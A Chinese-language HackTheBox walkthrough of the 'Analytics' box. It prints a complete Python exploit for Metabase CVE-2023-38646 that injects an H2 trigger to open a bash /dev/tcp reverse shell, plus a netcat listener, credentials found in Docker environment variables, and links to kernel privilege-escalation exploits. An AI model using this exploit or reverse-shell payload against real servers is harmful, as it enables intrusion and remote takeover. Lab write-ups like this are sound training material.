HackTheBox系列-Analytics

Analytics

0x01 信息收集

1、使用nmap进行端口扫描

nmap -p- --min-rate 10000 10.10.11.233

2、发现目标开放了两个端口，对22和80端口进行信息收集

nmap -sC -sV -A -p 22,80 10.10.11.233

3、扫描发现80端口绑定着一个域名analytical.htb，将其添加到hosts文件中并使用浏览器访问

4、对网页进行信息收集发现一个子域名data.analytical.htb

5、目录枚举半天也没有发现什么，子域名爆破也没有爆破出来其它子域名

6、将发现的子域名添加到hosts文件并使用浏览器访问刚才在源码中发现的子域名，发现是一个标题为Metabase的站

0x02 User

1、搜索关键字Metabase发现其是一款开源的分析工具

2、searchsploit搜索没有发现存在的漏洞

3、在浏览器中搜索发现了CVE-2023-38646漏洞

4、本地监听4444端口，使用Github中找到的Poc对目标进行攻击

nc -nvlp 4444

python3 CVE-2023-38646.py --rhost http://data.analytical.htb --lhost 10.10.14.9 --lport 4444

import requests
import argparse
import base64
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from urllib.parse import urlparse

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def get_setup_token_and_version(ip_address):
    endpoint = "/api/session/properties"
    url = f"{ip_address}{endpoint}"
    try:
        print(f"[DEBUG] Fetching setup token from {url}...")
        response = requests.get(url, verify=False)
        if response.status_code == 200:
            data = response.json()
            setup_token = data.get("setup-token")
            metabase_version = data.get("version", {}).get("tag")

            if setup_token is None:
                print(f"[DEBUG] Setup token not found or is null for IP: {ip_address}\n")
            else:
                print(f"[DEBUG] Setup Token: {setup_token}")
                print(f"[DEBUG] Version: {metabase_version}")

            return setup_token
    except requests.exceptions.RequestException as e:
        print(f"[DEBUG] Exception occurred: {e}")
        print(f"[DEBUG] Failed to connect to {ip_address}.\n")

def post_setup_validate(ip_address, setup_token, listener_ip, listener_port):
    payload = base64.b64encode(f"bash -i >&/dev/tcp/{listener_ip}/{listener_port} 0>&1".encode()).decode()

    print(f"[DEBUG] Payload = {payload}")

    endpoint = "/api/setup/validate"
    url = f"{ip_address}{endpoint}"
    headers = {'Content-Type': 'application/json'}
    data = {
        "token": setup_token,
        "details": {
            "is_on_demand": False,
            "is_full_sync": False,
            "is_sample": False,
            "cache_ttl": None,
            "refingerprint": False,
            "auto_run_queries": True,
            "schedules": {},
            "details": {
                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {{echo,{payload}}}|{{base64,-d}}|{{bash,-i}}')\n$$--=x",
                "advanced-options": False,
                "ssl": True
            },
            "name": "test",
            "engine": "h2"
        }
    }

    print(f"[DEBUG] Sending request to {url} with headers {headers} and data {json.dumps(data, indent=4)}")

    try:
        response = requests.post(url, headers=headers, json=data, verify=False)
        print(f"[DEBUG] Response received: {response.text}")
        if response.status_code == 200:
            print(f"[DEBUG] POST to {url} successful.\n")
        else:
            print(f"[DEBUG] POST to {url} failed with status code: {response.status_code}\n")
    except requests.exceptions.RequestException as e:
        print(f"[DEBUG] Exception occurred: {e}")
        print(f"[DEBUG] Failed to connect to {url}\n")

def preprocess_url(user_input):
    parsed_url = urlparse(user_input)
    protocol = f"{parsed_url.scheme}://" if parsed_url.scheme else "http://"
    netloc = parsed_url.netloc or parsed_url.path
    return protocol + netloc.rstrip('/')

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Check setup token')
    parser.add_argument('--rhost', type=str, help='Metabase server IP address (including http:// or https:// and port number if needed)')
    parser.add_argument('--lhost', type=str, help='Listener IP address')
    parser.add_argument('--lport', type=int, default=4444, help='Listener port (default is 4444)')
    args = parser.parse_args()

    print(f"[DEBUG] Original rhost: {args.rhost}")
    args.rhost = preprocess_url(args.rhost)
    print(f"[DEBUG] Preprocessed rhost: {args.rhost}")

    print(f"[DEBUG] Input Arguments - rhost: {args.rhost}, lhost: {args.lhost}, lport: {args.lport}")

    setup_token = get_setup_token_and_version(args.rhost)
    print(f"[DEBUG] Setup token: {setup_token}")
    if setup_token:
        post_setup_validate(args.rhost, setup_token, args.lhost, args.lport)

5、前往home里查看user的flag发现是空的？？？

6、继续回到根目录翻目录发现.dockerenv，可能这是个docker

7、尝试使用env命令去查看docker的环境变量，发现了其中存在的登录凭据

META_USER=metalytics
META_PASS=An4lytics_ds20223#

8、使用凭据进行ssh登录后获取到user的flag

 ssh metalytics@10.10.11.233

0x03 Root

1、信息收集当前内核版本为22.04

metalytics@analytics:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
metalytics@analytics:~$ uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
metalytics@analytics:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 22.04.3 LTS
Release:        22.04
Codename:       jammy
metalytics@analytics:~$

2、查找发现可以使用sh脚本进行提权

https://github.com/OllaPapito/gameoverlay

3、提权成功但是不能访问root目录

metalytics@analytics:~$ cd /tmp
metalytics@analytics:/tmp$ ./yebai.sh
root@analytics:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@analytics:/tmp# cd /root
bash: cd: /root: Permission denied
root@analytics:/tmp#

4、查看大佬wp发现可以使用CVE-2021-3493进行内核提权，当前靶机内核版本是22.04不知道为什么可以使用该漏洞…没有查到资料

https://github.com/briskets/CVE-2021-3493

5、使用python3启一个http服务，将Exploit进行编译后下载到靶机中

6、赋予执行权限进行执行获得root以后发现还是不行

7、只能万能重启大法再来一遍了，成功拿到flag，看来果然是有坏Yin玩坏了机器